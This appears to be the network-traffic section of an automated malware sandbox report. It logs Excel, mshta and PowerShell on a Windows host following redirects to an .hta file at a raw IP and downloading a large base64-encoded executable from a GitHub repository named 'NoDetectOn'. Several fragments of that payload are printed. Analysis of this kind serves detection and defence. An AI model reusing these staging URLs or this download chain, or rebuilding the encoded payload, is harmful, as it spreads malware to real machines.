                                                                                                                                            Accept: */*
                                                                                                                                            Accept-Language: fr-FR
                                                                                                                                            UA-CPU: AMD64
                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                            Host: stylite.io
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            2024-10-04 09:55:56 UTC427INHTTP/1.1 302 Found
                                                                                                                                            Content-Length: 80
                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                            Date: Fri, 04 Oct 2024 09:55:56 GMT
                                                                                                                                            Location: http://192.3.220.20/97/ug/Newprojectupdatedwithmegreat.hta
                                                                                                                                            Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                                                                            Vary: Accept
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            X-Dns-Prefetch-Control: off
                                                                                                                                            X-Download-Options: noopen
                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                            X-Xss-Protection: 0
                                                                                                                                            Connection: close
                                                                                                                                            2024-10-04 09:55:56 UTC80INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 32 32 30 2e 32 30 2f 39 37 2f 75 67 2f 4e 65 77 70 72 6f 6a 65 63 74 75 70 64 61 74 65 64 77 69 74 68 6d 65 67 72 65 61 74 2e 68 74 61
                                                                                                                                            Data Ascii: Found. Redirecting to http://192.3.220.20/97/ug/Newprojectupdatedwithmegreat.hta


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            2192.168.2.2249170185.199.111.1334433228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-04 09:56:10 UTC128OUTGET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1
                                                                                                                                            Host: raw.githubusercontent.com
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            2024-10-04 09:56:10 UTC902INHTTP/1.1 200 OK
                                                                                                                                            Connection: close
                                                                                                                                            Content-Length: 2935468
                                                                                                                                            Cache-Control: max-age=300
                                                                                                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                            ETag: "df9ff7aedbae4b4f50e2ae3a8f13fd0b84c66fbd35e7ac0df91a7a47b720c032"
                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            X-Frame-Options: deny
                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                            X-GitHub-Request-Id: DDDE:3E1F9D:6A875A:733786:66FFB31C
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Date: Fri, 04 Oct 2024 09:56:10 GMT
                                                                                                                                            Via: 1.1 varnish
                                                                                                                                            X-Served-By: cache-ewr-kewr1740056-EWR
                                                                                                                                            X-Cache: HIT
                                                                                                                                            X-Cache-Hits: 0
                                                                                                                                            X-Timer: S1728035771.529903,VS0,VE68
                                                                                                                                            Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                            X-Fastly-Request-ID: 114899357e22a69be349cf81251013e82d9f921d
                                                                                                                                            Expires: Fri, 04 Oct 2024 10:01:10 GMT
                                                                                                                                            Source-Age: 0
                                                                                                                                            2024-10-04 09:56:10 UTC1378INData Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 41 4f 50 39 57 59 41 41 41 41 41 41 41 41 41 41 4f 41 41 44 69 45 4c 41 54 41 41 41 4a 41 68 41 41 41 47 41 41 41 41 41 41 41 41 33 71 38 68 41 41 41 67 41 41 41 41 77 43 45 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41
                                                                                                                                            Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAAOP9WYAAAAAAAAAAOAADiELATAAAJAhAAAGAAAAAAAA3q8hAAAgAAAAwCEAAABAAAAgAAAAAgA
                                                                                                                                            2024-10-04 09:56:10 UTC1378INData Raw: 41 41 42 67 41 41 41 44 67 41 41 41 41 41 4b 67 49 44 66 51 55 41 41 41 51 67 41 41 41 41 41 48 36 45 45 41 41 45 65 30 41 51 41 41 51 35 30 76 2f 2f 2f 79 59 67 41 41 41 41 41 44 6a 48 2f 2f 2f 2f 41 45 59 6f 45 67 41 41 42 67 49 6f 43 51 41 41 42 69 67 42 41 41 41 4b 4b 67 41 41 45 7a 41 44 41 47 30 41 41 41 41 42 41 41 41 52 49 41 45 41 41 41 44 2b 44 67 41 41 4f 41 41 41 41 41 44 2b 44 41 41 41 52 51 49 41 41 41 41 46 41 41 41 41 47 51 41 41 41 44 67 41 41 41 41 41 41 69 67 55 41 41 41 47 41 32 38 46 41 41 41 47 4b 42 55 41 41 41 59 71 46 69 6f 43 4b 42 4d 41 41 41 59 44 4b 42 4d 41 41 41 59 6f 41 67 41 41 43 6a 6e 6f 2f 2f 2f 2f 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 73 75 45 41 41 45 4f 72 44 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 70 66 2f 2f 2f
                                                                                                                                            Data Ascii: AABgAAADgAAAAAKgIDfQUAAAQgAAAAAH6EEAAEe0AQAAQ50v///yYgAAAAADjH////AEYoEgAABgIoCQAABigBAAAKKgAAEzADAG0AAAABAAARIAEAAAD+DgAAOAAAAAD+DAAARQIAAAAFAAAAGQAAADgAAAAAAigUAAAGA28FAAAGKBUAAAYqFioCKBMAAAYDKBMAAAYoAgAACjno////IAAAAAB+hBAABHsuEAAEOrD///8mIAAAAAA4pf///
                                                                                                                                            2024-10-04 09:56:10 UTC1378INData Raw: 49 41 45 41 41 41 41 34 6d 66 2f 2f 2f 77 49 4f 42 48 30 4a 41 41 41 45 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 74 61 45 41 41 45 4f 58 33 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 63 76 2f 2f 2f 7a 49 43 4b 42 6b 41 41 41 59 6f 4a 77 41 41 42 69 6f 41 41 41 41 54 4d 41 4d 41 6b 51 41 41 41 41 4d 41 41 42 45 67 41 77 41 41 41 50 34 4f 41 41 41 34 41 41 41 41 41 50 34 4d 41 41 42 46 42 41 41 41 41 41 59 41 41 41 41 46 41 41 41 41 4c 41 41 41 41 46 49 41 41 41 41 34 41 51 41 41 41 43 6f 52 41 53 67 6b 41 41 41 47 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 73 2f 45 41 41 45 4f 73 72 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 76 2f 2f 2f 2f 78 45 42 4f 64 4c 2f 2f 2f 38 67 41 41 41 41 41 48 36 45 45 41 41 45 65 33 77 51 41 41 51 36 70 50 2f 2f 2f 79 59 67 41 41 41
                                                                                                                                            Data Ascii: IAEAAAA4mf///wIOBH0JAAAEIAAAAAB+hBAABHtaEAAEOX3///8mIAAAAAA4cv///zICKBkAAAYoJwAABioAAAATMAMAkQAAAAMAABEgAwAAAP4OAAA4AAAAAP4MAABFBAAAAAYAAAAFAAAALAAAAFIAAAA4AQAAACoRASgkAAAGIAAAAAB+hBAABHs/EAAEOsr///8mIAEAAAA4v////xEBOdL///8gAAAAAH6EEAAEe3wQAAQ6pP///yYgAAA
                                                                                                                                            2024-10-04 09:56:10 UTC1378INData Raw: 45 67 41 41 41 41 41 48 36 45 45 41 41 45 65 79 49 51 41 41 51 36 53 66 2f 2f 2f 79 59 67 42 41 41 41 41 44 67 2b 2f 2f 2f 2f 45 51 51 6f 4f 51 41 41 42 6a 72 4d 2f 2f 2f 2f 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 74 6d 45 41 41 45 4f 68 37 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 45 2f 2f 2f 2f 39 33 45 2f 76 2f 2f 45 51 51 36 58 51 41 41 41 43 41 41 41 41 41 41 66 6f 51 51 41 41 52 37 69 68 41 41 42 44 6b 50 41 41 41 41 4a 69 41 41 41 41 41 41 4f 41 51 41 41 41 44 2b 44 41 55 41 52 51 4d 41 41 41 41 46 41 41 41 41 4b 51 41 41 41 44 6f 41 41 41 41 34 41 41 41 41 41 44 67 77 41 41 41 41 49 41 45 41 41 41 42 2b 68 42 41 41 42 48 73 6f 45 41 41 45 4f 74 48 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 78 76 2f 2f 2f 78 45 45 4b 44 6f 41 41 41 59 67 41 67 41 41 41
                                                                                                                                            Data Ascii: EgAAAAAH6EEAAEeyIQAAQ6Sf///yYgBAAAADg+////EQQoOQAABjrM////IAAAAAB+hBAABHtmEAAEOh7///8mIAAAAAA4E////93E/v//EQQ6XQAAACAAAAAAfoQQAAR7ihAABDkPAAAAJiAAAAAAOAQAAAD+DAUARQMAAAAFAAAAKQAAADoAAAA4AAAAADgwAAAAIAEAAAB+hBAABHsoEAAEOtH///8mIAEAAAA4xv///xEEKDoAAAYgAgAAA
                                                                                                                                            2024-10-04 09:56:10 UTC1378INData Raw: 4f 4a 50 2f 2f 2f 38 43 46 48 30 51 41 41 41 45 49 41 55 41 41 41 41 34 67 76 2f 2f 2f 77 4a 37 45 41 41 41 42 43 67 45 41 41 41 72 49 41 45 41 41 41 42 2b 68 42 41 41 42 48 74 63 45 41 41 45 4f 6d 50 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 57 50 2f 2f 2f 79 6f 71 41 6e 73 50 41 41 41 45 4b 41 55 41 41 43 73 67 41 41 41 41 41 48 36 45 45 41 41 45 65 78 6b 51 41 41 51 35 4e 2f 2f 2f 2f 79 59 67 41 41 41 41 41 44 67 73 2f 2f 2f 2f 41 41 41 6d 66 68 45 41 41 41 51 55 2f 67 45 71 41 41 41 61 66 68 45 41 41 41 51 71 41 43 72 2b 43 51 41 41 62 77 30 41 41 41 6f 71 41 43 72 2b 43 51 41 41 62 77 63 41 41 41 6f 71 41 43 72 2b 43 51 41 41 62 31 30 41 41 41 59 71 41 44 34 41 2f 67 6b 41 41 50 34 4a 41 51 41 6f 62 77 41 41 42 69 6f 36 2f 67 6b 41 41 50 34 4a 41 51 42
                                                                                                                                            Data Ascii: OJP///8CFH0QAAAEIAUAAAA4gv///wJ7EAAABCgEAAArIAEAAAB+hBAABHtcEAAEOmP///8mIAEAAAA4WP///yoqAnsPAAAEKAUAACsgAAAAAH6EEAAEexkQAAQ5N////yYgAAAAADgs////AAAmfhEAAAQU/gEqAAAafhEAAAQqACr+CQAAbw0AAAoqACr+CQAAbwcAAAoqACr+CQAAb10AAAYqAD4A/gkAAP4JAQAobwAABio6/gkAAP4JAQB
                                                                                                                                            2024-10-04 09:56:10 UTC1378INData Raw: 67 41 41 41 5a 7a 45 41 41 41 43 6e 4d 52 41 41 41 4b 66 52 41 41 41 41 51 67 41 67 41 41 41 48 36 45 45 41 41 45 65 32 34 51 41 41 51 35 41 50 37 2f 2f 79 59 67 48 51 41 41 41 44 6a 31 2f 66 2f 2f 41 78 38 51 4b 4e 45 43 41 41 59 35 4a 41 49 41 41 43 41 4f 41 41 41 41 66 6f 51 51 41 41 52 37 4a 68 41 41 42 44 6e 55 2f 66 2f 2f 4a 69 41 44 41 41 41 41 4f 4d 6e 39 2f 2f 38 43 65 78 59 41 41 41 51 52 42 68 45 48 49 50 2f 2f 2f 33 39 66 63 31 67 41 41 41 5a 76 45 67 41 41 43 69 41 52 41 41 41 41 66 6f 51 51 41 41 52 37 55 78 41 41 42 44 71 62 2f 66 2f 2f 4a 69 41 61 41 41 41 41 4f 4a 44 39 2f 2f 38 43 63 78 4d 41 41 41 70 39 46 67 41 41 42 43 41 48 41 41 41 41 4f 48 76 39 2f 2f 38 52 42 79 41 41 41 41 43 41 58 7a 6c 4a 41 51 41 41 49 41 55 41 41 41 41 34 5a
                                                                                                                                            Data Ascii: gAAAZzEAAACnMRAAAKfRAAAAQgAgAAAH6EEAAEe24QAAQ5AP7//yYgHQAAADj1/f//Ax8QKNECAAY5JAIAACAOAAAAfoQQAAR7JhAABDnU/f//JiADAAAAOMn9//8CexYAAAQRBhEHIP///39fc1gAAAZvEgAACiARAAAAfoQQAAR7UxAABDqb/f//JiAaAAAAOJD9//8CcxMAAAp9FgAABCAHAAAAOHv9//8RByAAAACAXzlJAQAAIAUAAAA4Z
                                                                                                                                            2024-10-04 09:56:10 UTC1378INData Raw: 41 41 42 2b 68 42 41 41 42 48 73 78 45 41 41 45 4f 6b 6a 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 50 66 2f 2f 2f 7a 6a 53 2f 2f 2f 2f 49 41 55 41 41 41 41 34 4c 76 2f 2f 2f 77 41 6f 55 67 41 41 42 68 45 42 4b 46 4d 41 41 41 59 54 42 53 41 41 41 41 41 41 66 6f 51 51 41 41 52 37 5a 78 41 41 42 44 6f 50 41 41 41 41 4a 69 41 41 41 41 41 41 4f 41 51 41 41 41 44 2b 44 41 49 41 52 51 45 41 41 41 41 46 41 41 41 41 4f 41 41 41 41 41 44 64 5a 77 41 41 41 43 59 67 41 41 41 41 41 48 36 45 45 41 41 45 65 30 73 51 41 41 51 36 44 77 41 41 41 43 59 67 41 41 41 41 41 44 67 45 41 41 41 41 2f 67 77 41 41 45 55 43 41 41 41 41 42 51 41 41 41 43 63 41 41 41 41 34 41 41 41 41 41 42 51 54 42 53 41 41 41 41 41 41 66 6f 51 51 41 41 52 37 67 68 41 41 42 44 72 58 2f 2f 2f 2f 4a 69 41
                                                                                                                                            Data Ascii: AAB+hBAABHsxEAAEOkj///8mIAAAAAA4Pf///zjS////IAUAAAA4Lv///wAoUgAABhEBKFMAAAYTBSAAAAAAfoQQAAR7ZxAABDoPAAAAJiAAAAAAOAQAAAD+DAIARQEAAAAFAAAAOAAAAADdZwAAACYgAAAAAH6EEAAEe0sQAAQ6DwAAACYgAAAAADgEAAAA/gwAAEUCAAAABQAAACcAAAA4AAAAABQTBSAAAAAAfoQQAAR7ghAABDrX////JiA
                                                                                                                                            2024-10-04 09:56:10 UTC1378INData Raw: 59 67 43 41 41 41 41 44 67 4a 2f 76 2f 2f 45 51 45 6f 53 77 41 41 42 68 4d 48 49 41 73 41 41 41 41 34 39 76 33 2f 2f 78 45 4a 4b 68 45 41 65 78 67 41 41 41 51 6f 56 77 41 41 42 6e 4d 67 41 41 41 47 45 77 6b 67 42 67 41 41 41 44 6a 57 2f 66 2f 2f 4f 4e 37 2f 2f 2f 38 67 44 41 41 41 41 48 36 45 45 41 41 45 65 7a 38 51 41 41 51 36 76 66 33 2f 2f 79 59 67 44 67 41 41 41 44 69 79 2f 66 2f 2f 41 6e 73 54 41 41 41 45 45 51 51 52 42 53 68 57 41 41 41 47 45 77 67 67 42 77 41 41 41 44 69 58 2f 66 2f 2f 41 42 4d 77 41 77 42 39 41 41 41 41 41 51 41 41 45 53 41 43 41 41 41 41 2f 67 34 41 41 44 67 41 41 41 41 41 2f 67 77 41 41 45 55 44 41 41 41 41 57 51 41 41 41 41 55 41 41 41 41 76 41 41 41 41 4f 46 51 41 41 41 41 43 63 77 34 41 41 41 70 39 45 41 41 41 42 43 41 41 41
                                                                                                                                            Data Ascii: YgCAAAADgJ/v//EQEoSwAABhMHIAsAAAA49v3//xEJKhEAexgAAAQoVwAABnMgAAAGEwkgBgAAADjW/f//ON7///8gDAAAAH6EEAAEez8QAAQ6vf3//yYgDgAAADiy/f//AnsTAAAEEQQRBShWAAAGEwggBwAAADiX/f//ABMwAwB9AAAAAQAAESACAAAA/g4AADgAAAAA/gwAAEUDAAAAWQAAAAUAAAAvAAAAOFQAAAACcw4AAAp9EAAABCAAA
                                                                                                                                            2024-10-04 09:56:10 UTC1378INData Raw: 42 68 62 2b 42 43 6f 41 41 41 41 2b 44 77 41 44 4b 48 45 41 41 41 59 57 2f 67 49 57 2f 67 45 71 4d 67 38 41 41 79 68 78 41 41 41 47 46 76 34 43 4b 67 41 41 41 44 34 50 41 41 4d 6f 63 51 41 41 42 68 62 2b 42 42 62 2b 41 53 6f 6d 44 77 41 44 4b 48 49 41 41 41 59 71 41 41 41 79 44 77 41 44 4b 48 49 41 41 41 59 57 2f 67 45 71 41 41 41 41 45 7a 41 44 41 41 6f 42 41 41 41 4b 41 41 41 52 49 41 51 41 41 41 44 2b 44 67 41 41 4f 41 41 41 41 41 44 2b 44 41 41 41 52 51 55 41 41 41 43 4b 41 41 41 41 73 51 41 41 41 41 55 41 41 41 42 67 41 41 41 41 4c 77 41 41 41 44 69 46 41 41 41 41 45 67 45 44 65 78 30 41 41 41 51 6f 48 51 41 41 43 69 6f 43 65 78 34 41 41 41 52 76 48 67 41 41 43 67 4e 37 48 67 41 41 42 43 68 34 41 41 41 47 62 78 38 41 41 41 6f 71 41 69 68 6a 41 41 41
                                                                                                                                            Data Ascii: Bhb+BCoAAAA+DwADKHEAAAYW/gIW/gEqMg8AAyhxAAAGFv4CKgAAAD4PAAMocQAABhb+BBb+ASomDwADKHIAAAYqAAAyDwADKHIAAAYW/gEqAAAAEzADAAoBAAAKAAARIAQAAAD+DgAAOAAAAAD+DAAARQUAAACKAAAAsQAAAAUAAABgAAAALwAAADiFAAAAEgEDex0AAAQoHQAACioCex4AAARvHgAACgN7HgAABCh4AAAGbx8AAAoqAihjAAA
                                                                                                                                            2024-10-04 09:56:10 UTC1378INData Raw: 2f 2f 2f 78 4d 77 41 77 43 42 41 41 41 41 43 77 41 41 45 53 41 43 41 41 41 41 2f 67 34 41 41 44 67 41 41 41 41 41 2f 67 77 41 41 45 55 44 41 41 41 41 4c 51 41 41 41 44 67 41 41 41 41 46 41 41 41 41 4f 43 67 41 41 41 41 43 41 79 68 37 41 41 41 47 45 77 45 67 41 51 41 41 41 48 36 45 45 41 41 45 65 35 59 51 41 41 51 36 7a 66 2f 2f 2f 79 59 67 41 51 41 41 41 44 6a 43 2f 2f 2f 2f 46 43 6f 52 41 51 51 6f 67 51 41 41 42 69 6f 52 41 54 72 77 2f 2f 2f 2f 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 73 31 45 41 41 45 4f 5a 7a 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 6b 66 2f 2f 2f 77 41 41 41 42 4d 77 42 41 43 43 41 41 41 41 43 77 41 41 45 53 41 42 41 41 41 41 2f 67 34 41 41 44 67 41 41 41 41 41 2f 67 77 41 41 45 55 44 41 41 41 41 42 51 41 41 41 43 73 41 41 41 42 55 41
                                                                                                                                            Data Ascii: ///xMwAwCBAAAACwAAESACAAAA/g4AADgAAAAA/gwAAEUDAAAALQAAADgAAAAFAAAAOCgAAAACAyh7AAAGEwEgAQAAAH6EEAAEe5YQAAQ6zf///yYgAQAAADjC////FCoRAQQogQAABioRATrw////IAAAAAB+hBAABHs1EAAEOZz///8mIAAAAAA4kf///wAAABMwBACCAAAACwAAESABAAAA/g4AADgAAAAA/gwAAEUDAAAABQAAACsAAABUA


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            3192.168.2.2249171213.183.76.214433432C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-04 09:56:13 UTC321OUTGET /noDe HTTP/1.1
                                                                                                                                            Accept: */*
                                                                                                                                            UA-CPU: AMD64
                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                            Host: stylite.io
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            2024-10-04 09:56:14 UTC427INHTTP/1.1 302 Found
                                                                                                                                            Content-Length: 80
                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                            Date: Fri, 04 Oct 2024 09:56:13 GMT
                                                                                                                                            Location: http://192.3.220.20/97/ug/Newprojectupdatedwithmegreat.hta
                                                                                                                                            Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                                                                            Vary: Accept
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            X-Dns-Prefetch-Control: off
                                                                                                                                            X-Download-Options: noopen
                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                            X-Xss-Protection: 0
                                                                                                                                            Connection: close
                                                                                                                                            2024-10-04 09:56:14 UTC80INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 32 32 30 2e 32 30 2f 39 37 2f 75 67 2f 4e 65 77 70 72 6f 6a 65 63 74 75 70 64 61 74 65 64 77 69 74 68 6d 65 67 72 65 61 74 2e 68 74 61
                                                                                                                                            Data Ascii: Found. Redirecting to http://192.3.220.20/97/ug/Newprojectupdatedwithmegreat.hta


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            4192.168.2.2249176213.183.76.224432104C:\Windows\System32\mshta.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-04 09:56:15 UTC345OUTGET /noDe HTTP/1.1
                                                                                                                                            Accept: */*
                                                                                                                                            Accept-Language: fr-FR
                                                                                                                                            UA-CPU: AMD64
                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                            Host: stylite.io
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            2024-10-04 09:56:15 UTC427INHTTP/1.1 302 Found
                                                                                                                                            Content-Length: 80
                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                            Date: Fri, 04 Oct 2024 09:56:15 GMT
                                                                                                                                            Location: http://192.3.220.20/97/ug/Newprojectupdatedwithmegreat.hta
                                                                                                                                            Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                                                                            Vary: Accept
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            X-Dns-Prefetch-Control: off
                                                                                                                                            X-Download-Options: noopen
                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                            X-Xss-Protection: 0
                                                                                                                                            Connection: close
                                                                                                                                            2024-10-04 09:56:15 UTC80INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 32 32 30 2e 32 30 2f 39 37 2f 75 67 2f 4e 65 77 70 72 6f 6a 65 63 74 75 70 64 61 74 65 64 77 69 74 68 6d 65 67 72 65 61 74 2e 68 74 61
                                                                                                                                            Data Ascii: Found. Redirecting to http://192.3.220.20/97/ug/Newprojectupdatedwithmegreat.hta


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            5192.168.2.2249180185.199.111.1334433956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-04 09:56:28 UTC128OUTGET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1
                                                                                                                                            Host: raw.githubusercontent.com
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            2024-10-04 09:56:28 UTC902INHTTP/1.1 200 OK
                                                                                                                                            Connection: close
                                                                                                                                            Content-Length: 2935468
                                                                                                                                            Cache-Control: max-age=300
                                                                                                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                            ETag: "df9ff7aedbae4b4f50e2ae3a8f13fd0b84c66fbd35e7ac0df91a7a47b720c032"
                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            X-Frame-Options: deny
                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                            X-GitHub-Request-Id: DDDE:3E1F9D:6A875A:733786:66FFB31C
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Date: Fri, 04 Oct 2024 09:56:28 GMT
                                                                                                                                            Via: 1.1 varnish
                                                                                                                                            X-Served-By: cache-ewr-kewr1740029-EWR
                                                                                                                                            X-Cache: HIT
                                                                                                                                            X-Cache-Hits: 1
                                                                                                                                            X-Timer: S1728035789.728085,VS0,VE4
                                                                                                                                            Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                            X-Fastly-Request-ID: 3bb9fda046bb5040410c6bccb363c6a29a356470
                                                                                                                                            Expires: Fri, 04 Oct 2024 10:01:28 GMT
                                                                                                                                            Source-Age: 18
                                                                                                                                            2024-10-04 09:56:28 UTC1378INData Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 41 4f 50 39 57 59 41 41 41 41 41 41 41 41 41 41 4f 41 41 44 69 45 4c 41 54 41 41 41 4a 41 68 41 41 41 47 41 41 41 41 41 41 41 41 33 71 38 68 41 41 41 67 41 41 41 41 77 43 45 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41
                                                                                                                                            Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAAOP9WYAAAAAAAAAAOAADiELATAAAJAhAAAGAAAAAAAA3q8hAAAgAAAAwCEAAABAAAAgAAAAAgA
                                                                                                                                            2024-10-04 09:56:28 UTC1378INData Raw: 41 41 42 67 41 41 41 44 67 41 41 41 41 41 4b 67 49 44 66 51 55 41 41 41 51 67 41 41 41 41 41 48 36 45 45 41 41 45 65 30 41 51 41 41 51 35 30 76 2f 2f 2f 79 59 67 41 41 41 41 41 44 6a 48 2f 2f 2f 2f 41 45 59 6f 45 67 41 41 42 67 49 6f 43 51 41 41 42 69 67 42 41 41 41 4b 4b 67 41 41 45 7a 41 44 41 47 30 41 41 41 41 42 41 41 41 52 49 41 45 41 41 41 44 2b 44 67 41 41 4f 41 41 41 41 41 44 2b 44 41 41 41 52 51 49 41 41 41 41 46 41 41 41 41 47 51 41 41 41 44 67 41 41 41 41 41 41 69 67 55 41 41 41 47 41 32 38 46 41 41 41 47 4b 42 55 41 41 41 59 71 46 69 6f 43 4b 42 4d 41 41 41 59 44 4b 42 4d 41 41 41 59 6f 41 67 41 41 43 6a 6e 6f 2f 2f 2f 2f 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 73 75 45 41 41 45 4f 72 44 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 70 66 2f 2f 2f
                                                                                                                                            Data Ascii: AABgAAADgAAAAAKgIDfQUAAAQgAAAAAH6EEAAEe0AQAAQ50v///yYgAAAAADjH////AEYoEgAABgIoCQAABigBAAAKKgAAEzADAG0AAAABAAARIAEAAAD+DgAAOAAAAAD+DAAARQIAAAAFAAAAGQAAADgAAAAAAigUAAAGA28FAAAGKBUAAAYqFioCKBMAAAYDKBMAAAYoAgAACjno////IAAAAAB+hBAABHsuEAAEOrD///8mIAAAAAA4pf///
